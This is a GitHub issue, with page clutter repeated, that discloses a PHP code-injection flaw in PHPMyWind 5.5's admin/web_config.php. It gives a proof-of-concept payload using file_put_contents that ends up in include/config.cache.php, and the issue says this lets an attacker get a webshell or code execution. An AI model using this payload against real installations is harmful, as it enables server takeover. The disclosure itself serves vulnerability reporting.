phpmywind5.5 Code Execution2

### Attackers can get webshell or code execution
### 1.First download the phpmywind the Latest version from [http://phpmywind.com/downloads/PHPMyWind_5.5.zip](url)
### 2.install it
### 3.login as Admin
### 4.request  http://localhost/admin/web_config.php 
![shell](https://user-images.githubusercontent.com/42397796/44141637-422df69a-a0b0-11e8-9005-6d2ff0b50232.png)
(select number!!!!!)
payload 1;file_put_contents("../panghusec.txt","just a test");
![burp](https://user-images.githubusercontent.com/42397796/44141697-7949a6b0-a0b0-11e8-97dd-b28dcb100dcf.png)
### 5.then the payload is written in the include/config.cache.php
![get](https://user-images.githubusercontent.com/42397796/44141768-ba452fa4-a0b0-11e8-8a6a-9da6346b72ba.png)

then in root directory panghusec.txt will be created:-)
In summary: from admin/web_config.php Insert data into database and in lines 66 enter !Writef function and code execution :)


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

phpmywind5.5 Code Execution2 #5

Attackers can get webshell or code execution

1.First download the phpmywind the Latest version from http://phpmywind.com/downloads/PHPMyWind_5.5.zip

2.install it

3.login as Admin

4.request http://localhost/admin/web_config.php

5.then the payload is written in the include/config.cache.php

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

phpmywind5.5 Code Execution2 #5

Description

Attackers can get webshell or code execution

1.First download the phpmywind the Latest version from http://phpmywind.com/downloads/PHPMyWind_5.5.zip

2.install it

3.login as Admin

4.request http://localhost/admin/web_config.php

5.then the payload is written in the include/config.cache.php

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions